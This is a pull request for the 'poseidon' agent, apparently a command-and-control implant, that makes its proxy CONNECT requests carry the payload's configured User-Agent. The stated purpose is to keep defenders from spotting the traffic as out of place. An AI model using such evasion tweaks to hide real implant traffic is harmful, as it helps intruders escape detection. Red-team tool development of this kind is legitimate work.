### PR TITLE
Match proxy user-agent with payload user-agent

### DIFF
--- a/Payload_Type/poseidon/agent_code/pkg/profiles/http.go
+++ b/Payload_Type/poseidon/agent_code/pkg/profiles/http.go
@@ -368,13 +368,17 @@ func (c *C2Default) htmlPostData(urlEnding string, sendData []byte) []byte {
 		} else {
 			req.ContentLength = int64(contentLength)
 			// set headers
-			for _, val := range c.HeaderList {
-				if val.Key == "Host" {
-					req.Host = val.Value
-				} else {
-					req.Header.Set(val.Key, val.Value)
-				}
-			}
+                        for _, val := range c.HeaderList {
+                                if val.Key == "Host" {
+                                        req.Host = val.Value
+                                } else if val.Key == "User-Agent" {
+                                        req.Header.Set(val.Key, val.Value)
+                                        tr.ProxyConnectHeader = http.Header{}
+                                        tr.ProxyConnectHeader.Add("User-Agent",val.Value)
+                                } else {
+                                        req.Header.Set(val.Key, val.Value)
+                                }
+                        }
 			if len(c.ProxyPass) > 0 && len(c.ProxyUser) > 0 {
 				auth := fmt.Sprintf("%s:%s", c.ProxyUser, c.ProxyPass)
 				basicAuth := "Basic " + base64.StdEncoding.EncodeToString([]byte(auth))


### PR DESCRIPTION
When a proxy is set, poseidon sends CONNECT requests with the default golang user-agent "Go-http-client/1.1", rather than using the user-agent defined for the payload. This can create some opsec issues, as the traffic can be signatured as out of place.

<img width="376" alt="normal-behavior-proxyUA" src="https://user-images.githubusercontent.com/109013079/212768094-4b0afaab-9f59-42e0-b658-b7652c575964.png">


A quick fix for this would be to add a call to ProxyConnectHeader during the headers check in http.go, so that the user-agent matches what is defined during build.


<img width="395" alt="fixed-behavior-proxyUA" src="https://user-images.githubusercontent.com/109013079/212767957-a3ab0386-bd80-4e2c-bda0-923f301dda14.png">


Steps to reproduce:
1. Set http/https proxy variables in environment
2. Run poseidon payload with default config
3. Have a netcat listener ready on the proxy:port
4. Observe user-agent is golang default and not the one defined during payload generation

